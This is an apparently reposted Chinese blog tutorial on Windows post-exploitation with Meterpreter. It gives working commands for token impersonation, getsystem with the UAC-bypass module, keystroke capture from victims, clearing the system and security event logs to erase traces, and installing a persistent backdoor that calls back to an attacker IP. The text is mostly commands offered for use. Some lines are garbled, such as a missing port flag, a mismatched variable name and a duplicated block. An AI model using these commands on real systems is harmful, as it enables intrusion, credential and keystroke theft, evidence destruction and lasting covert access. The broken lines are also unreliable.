kalilinux-权限提升


meterpeter:

  1. 可以在 Meterpreter 使用 incognito 来开始模拟过程:
    use incognito
  2. 展示 incognito 的帮助文档,通过输入 help 命令:
    help
  3. 获得可用用户的列表
    list_tokens –u
  4. 模拟攻击
    impersonate_token \willie-pc\willie

本地提权攻击:
getsystem

如果你尝试获得 Windows 7 主机的访问,你必须在执行 getsystem 命令之前执
行 bypassuac 。 bypassuac 允许你绕过微软的用户账户控制。这个命令这样运
行: run post/windows/escalate/bypassuac 。


收集受害者数据:
keyscan_start
keyscan_dump
也可以使用 Wireshark 或
airodump-ng 来更简单地收集数据。


清理踪迹:

  1. 运行 IRB,以便进行日志移除操作。我们打开帮助文件:
    irb
  2. 下面,我们告诉 IRB 要移除哪个文件。下面是一个可用的选择:
    log = client.sys.eventlog.open('system')
    log = client.sys.eventlog.open('security')
    log = client.sys.eventlog.open('application')
    log = client.sys.eventlog.open('directory service')
    log = client.sys.eventlog.open('dns server')
    log = client.sys.eventlog.open('file replication service')
  3. 出于我们的目的,我们把它们都清理掉。你需要将这些一次键入:
    log = client.sys.eventlog.open('system')
    log = client.sys.eventlog.open('security')
    log = client.sys.eventlog.open('application')
    log = client.sys.eventlog.open('directory service')
    log = client.sys.eventlog.open('dns server')
    log = client.sys.eventlog.open('file replication service')
  4. 现在我们执行命令来清理日志文件:
    Log.clear

创建永久后门:
run persistence –h
kalilinux-权限提升_第1张图片

现在,我们执行命令来建立后门:
run persistence –U –A –i 10 – 8090 –r 192.168.10.109

后门现在已经建立了。如果成功的话,你会注意到你有了第二个 Meterpreter 会话。

转载于:https://www.cnblogs.com/itholidaycn/p/6394294.html

你可能感兴趣的:(kalilinux-权限提升)